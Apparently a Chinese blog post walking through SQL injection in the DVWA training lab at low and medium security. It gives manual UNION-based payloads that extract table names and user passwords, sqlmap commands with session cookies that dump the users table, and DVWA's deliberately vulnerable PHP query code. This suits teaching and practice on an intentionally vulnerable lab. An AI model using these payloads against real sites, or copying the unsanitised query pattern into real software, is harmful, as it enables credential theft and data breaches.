2. 程式人生 > >DVWA學習之SQL注入

DVWA學習之SQL注入

阿新 發佈:2019-12-03

DVWA學習之SQL注入

環境工具

dvwa 1.9

phpstudy

firefox

burpsuite

實驗步驟

一、設定安全級別為LOW

1. 登入DVWA,並將安全級別設定為LOW

2. 進入SQL注入模組,並輸入1,返回結果如下

3. 下面判斷注入型別是字元型注入還是整數型注入

字元型注入的SQL語句形如

select * from xx where id='$id'

 整數型注入的SQL語句形如

select * from xx where id=$id

 (1) 分別輸入 1 and 1=1 和 1 and 1=2,都能返回正常結果

說明不是整數型注入,因為如果是整數型注入,執行select * from xx where id=1 and 1=2 時應報錯。

(問:select * from xx where id='1 and 1=2' 這裡應該不返回結果才對?)

(2) 輸入 1’ or '1'='1 ,返回所有結果

4. 獲取列數

(1) 1' or '1'='1' order by 3 #

(2)  1' or '1'='1' order by 2 #

說明表中的資料共兩列

5. 獲取資料庫名

1' union select  1, database() #

 

6. 獲取資料庫中的表名

1' or '1'='1' union select 1,table_name from information_schema.tables where table_schema=database() #

 獲取guestbook, users 兩張表

7. 獲取users表中的列名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #

8. 獲取users 表中的使用者名稱密碼

1' union select user,password from users #

用sqlmap 實現SQL注入

1. 嘗試直接用url,發現結果跳轉到登入頁面,所以需要cookie 

2. 帶上cookie引數

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1"

3.  使用--batch 引數,可以讓sqlmap為我們自動填寫執行選項 

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1" --batch

4. 使用--dbs 獲取所有的資料庫

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1" --dbs
 

5. 使用-D指定資料庫,--tables 檢視資料中的表

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1" --D dvwa --tables

6. 用-D xxx -T xxx 指定表,--columns查看錶的列

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1" --D dvwa -T users --columns
  

7. 用-C xxx --dump 輸出指定列的資料 

python sqlmap.py -u "http://192.168.138.63/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6n3qbqcctf72hdh550hu7lskj1" -D dvwa -T users -C first_name,last_name,password --dump
 

(sqlmap 還可以爆破hash密碼)

附錄

伺服器核心程式碼(LOW)

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

 

二、設定安全級別為MEDIUM

1. 設定dvwa的安全級別為medium

2. sql注入介面隨便選擇id,返回正確結果

 

此時沒有輸入框,但可以通過burpsuite抓包的形式進行注入

3. 在burpsuite中修改id引數,即可實現注入

medium 的程式碼中添加了對特殊字元的轉義,但由於medium為數字型注入,用不上引號,所以可以用跟字元型注入同樣的方式進行注入

Sqlmap 實現注入

1. 用burpsuite 捕獲正常的資料包,然後右鍵,選擇 "copy to file",儲存為sql_dvwa.txt

2. 啟動sqlmap進行注入

python sqlmap.py -r sql_dvwa.txt

 其他操作同上

附錄

伺服器核心程式碼如下(medium)

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}

?>

&n

相關推薦

DVWA學習SQL注入

DVWA學習之SQL注入 環境工具 dvwa 1.9 phpstudy firefox burpsuite 實驗步驟 一、設定安全級別為LOW 1. 登入DVWA,並將安全級別設定為LOW 2. 進入SQL注入模組,並輸入1,返回結果如下 3. 下面判斷注入型別是字元型注入還是整數型注入 字元型注入的SQ

DVWA漏洞測試SQL注入

我們已經在前面討論過sql注入漏洞產生的原因和一些繞過waf的技巧。今天話不多說直接上測試: 首先我們先理清手工注入思路: 1.判斷是否存在注入,注入是字元型還是數字型 2.猜解SQL查詢語句中的欄位數 3.確定顯示的欄位順序 4.獲取當前資料庫 5

DVWA平臺的sql注入學習

要用UNION語句,必須先知道後臺的查詢語句的查詢結果是多少列的,所以利用order by語句測試,此處就是將輸入“‘ or '1' = '1' order by 1 -- ”的order by 1部分改成2,3……當按照第二列排序時,不報錯,當按第三列排序時,報錯,因此可得到查詢結果是2列的。所以我們用UN

web安全與防禦---2.DVWASQL注入

首先登入DVWA主頁: 1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。 2、進入SQL Injection頁面,出錯了。(心裡想著這DVWA是官網下的不至於玩

Mysql 學習 SQL的執行順序

src mage order join where clas 讀取 cnblogs num mysql的json查詢:

邁入orcl的學習----SQL函數

大小寫 ora -s to_char 空白 sel src log code 說道 orcl的SQL函數基礎內容都在這個圖中: 所以呢我在 這裏吧這些函數都給敲了一邊: ☆SQL函數 --一。字符函數--1.大小寫控制函數select lower(‘KK‘) from

DVWASQL註入

DVWA SQL註入 WEB SQL Injection本文需要的實驗環境及搭建請訪問:DVWA篇之環境搭建 SQL註入就是通過把sql語句插入到web表單提交或輸入頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令 Sql註入的一般流程: 1、判斷註入點2、判斷註入類型3、判斷數據庫類

MySQL數據庫學習SQL語句如何優化?數據庫開發

郵箱 list key 推薦 sin ges 操作 開關 RoCE   1) 現場抓出慢查詢語句 show full processlist;  2) 配置參數:  slow_query_log_file = ON 慢查詢開啟開關  long_query_time =2 記

2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)

首先進入DVWA,調整安全級別為low。 開啟SQL Injection頁面,ID欄輸入1 因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。 將抓包內容儲存至本地(/root/test) 開啟終端,輸入: sqlmap

Djangosql注入,XSS攻擊,CSRF攻擊原理及防護

sql注入的危害非法操作使用者資料庫的資料來獲取利益,通過修改資料庫來修改網頁的內容,注入木馬等比如下面的使用者登入時進行sql注入class LoginUnsafeView(View): def get(self,request): return r

滲透——SQL注入繞過技術總結

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85869703 1.繞過空格(註釋符/* */,%a0) 兩個空格代替一個空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a

網路安全知識SQL注入

所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令。具體來說,它是利用現有應用程式,將(惡意)的SQL命令注入到後臺資料庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的資料庫,而不

安全攻防SQL注入(通過sqlmap搞定所有問題)

第一步: sqlmap基於Python,所以首先下載: http://yunpan.cn/QiCBLZtGGTa7U  訪問密碼 c26e 第二步: 安裝Python,將sqlmap解壓到Python根目錄下; 第三步: 小試牛刀,檢視sqlmap版本: python sqlmap/sqlmap.py -

安全測試SQL注入攻擊

一、SQL注入攻擊的概念 首先說一下,攻擊者之所以可以利用自己輸入的資料來達到攻擊網站的目的,原因就在於SQL語言作為一種解釋型語言,它的資料其實是由程式設計師編寫的程式碼和使用者提交的資料共同組成的。正是這個原因,攻擊者可以構造對自己有利的資料,利用網站的一

Web安全SQL注入攻擊技巧與防範

在Web1.0時代,人們更多是關注伺服器端動態指令碼語言的安全問題,比如將一個可執行指令碼(俗稱Webshell)通過指令碼語言的漏洞上傳到伺服器上,從而獲得伺服器許可權。在Web發展初期,隨著動態指令碼語言的發展和普及,以及早期工程師對安全問題認知不足導致很多”安全血案”

零基礎學習手工SQL注入

原文地址:https://mozhe.cn/news/detail/324SQL注入介紹SQL注入,其實就是使用者瀏覽器提交的變數內容,應用程式(程式碼可能是asp、aspx、php、jsp等)對瀏覽器提交過來的資料未過濾,直接去資料庫查詢,導致把資料庫裡面其他內容(如管理賬

SQL sql 注入

何為sql注入        通過在 Web 表單中輸入(惡意)SQL 語句得到一個存在安全漏洞的網站上的資料庫,而不是按照設 計者意圖去執行 SQL 語句。舉例:當執行的 sql 為 select * from user where username = “admin”

Web安全SQL注入

什麼是SQL注入? sql注入是一種將sql程式碼新增到輸入引數中,傳遞到sql伺服器解析並執行的一種攻擊手法 SQL是怎麼產生的? WEB開發人員無法保證所有的輸入都已經過濾攻擊者利用傳送給SQL伺服器的輸入資料構造可執行的SQL程式碼資料庫未做相應安全配置 如

Java審計SQL注入

# Java審計之SQL注入篇 ## 0x00 前言 本篇文章作為Java Web 審計的一個入門文,也是我的第一篇審計文,後面打算更新一個小系列,來記錄一下我的審計學習的成長。 ## 0x01 JDBC 注入分析 在Java裡面常見的資料庫連線方式也就那麼幾個,分別是JDBC,Mybatis,和H

Java學習路- SQL注入

使用者名稱: __________ 密碼:———————   假如沒有使用預處理的Statement 物件 拼接字串查資料庫的話,易收到sql注入攻擊;   例如說 : mysql 中   #代表的是單行註釋  SELECT * FROM t_u